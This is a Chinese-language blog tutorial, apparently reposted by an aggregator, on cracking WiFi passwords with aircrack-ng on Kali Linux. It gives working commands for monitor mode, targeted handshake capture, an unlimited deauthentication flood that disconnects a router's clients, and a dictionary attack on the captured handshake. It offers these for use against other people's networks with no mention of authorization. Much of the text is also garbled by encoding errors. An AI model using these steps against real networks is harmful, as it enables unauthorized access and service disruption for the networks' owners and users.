Kali aircrack-ng wifi密码破解(暴力)(1)
1.kali linux安全滲透
?
2.工具aircrack-ng
?
3.ifconfig查看你的網(wǎng)卡信息,wlan0即無(wú)線網(wǎng)卡,注意,如果沒有發(fā)現(xiàn)網(wǎng)卡可能是芯片不能被識(shí)別,建議選擇網(wǎng)卡芯片為3037或rtl8187l的。
?
4。看到這個(gè)界面后輸入airmon-ng start wlan0(啟動(dòng)網(wǎng)卡監(jiān)聽模式)
?
5.啟動(dòng)后ifconfig查看一下,如果網(wǎng)卡名變成了wlan0mon了,則表示操作成功。
?
6.掃描附近wifi
airodump-ng wlan0mon
參數(shù)詳解:
BSSID: MAC地址
PWR:信號(hào)強(qiáng)度,越小信號(hào)越強(qiáng)。
#Data:傳輸?shù)臄?shù)據(jù), 數(shù)據(jù)越大對(duì)我們?cè)接欣? 大的夸張的可能在看電影
CH:信號(hào)頻道
ESSID:wifi名稱
抓包開始
(比如我要抓的是這個(gè))
?
?
7.然后輸入命令:
airodump-ng -c 11 --bssid 2E:E9:D3:28:59:EB -w?/home/chenglee/2018/?wlan0mon
?
?
?解析:
-c代表頻道, 后面帶的是頻道
bssid: mac地址(物理地址)
-w代表目錄(抓到的握手包放在這個(gè)目錄下面)
wlan0mon: 網(wǎng)卡名稱
一直跑吖跑, 它的數(shù)據(jù)是不停刷新變化的...
這時(shí)候應(yīng)該做點(diǎn)什么了,利用deauth洪水攻擊,取消目標(biāo)路由和所有設(shè)備的無(wú)線連接,這時(shí)候設(shè)備重新連接時(shí),會(huì)抓取他的握手包,然后用字典進(jìn)行爆破.
新開一個(gè)窗口觀察
?
ps:如果無(wú)法獲取包,攻擊路由器進(jìn)行斷網(wǎng)重新連接
輸入:aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB? wlan0mon
?
?
這時(shí)候目標(biāo)路由已經(jīng)斷網(wǎng),如果抓到包記得ctrl+c關(guān)掉這里,否則一直斷網(wǎng)就成惡作劇了。這時(shí)返回你抓包的那個(gè)窗口,如果右上角出現(xiàn)handshake這樣的信息(看下圖),這說(shuō)明抓包已經(jīng)成功。
?
?
?
可以進(jìn)去目錄看一下
?
8.破解
輸入:aircrack-ng -w?/home/chenglee/dictionary/wpa.txt?/home/chenglee/2018/-01.cap
?
?
解析:
-w后面接的是字典
-01.cap是握手包
也許過程會(huì)有點(diǎn)長(zhǎng), 這個(gè)得看密碼復(fù)雜的與字典的好壞。
?
總結(jié)
以上是生活随笔為你收集整理的Kali aircrack-ng wifi密码破解(暴力)(1)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 数据库应用系统——引言
- 下一篇: IAR编译Z-Stack项目报错—Err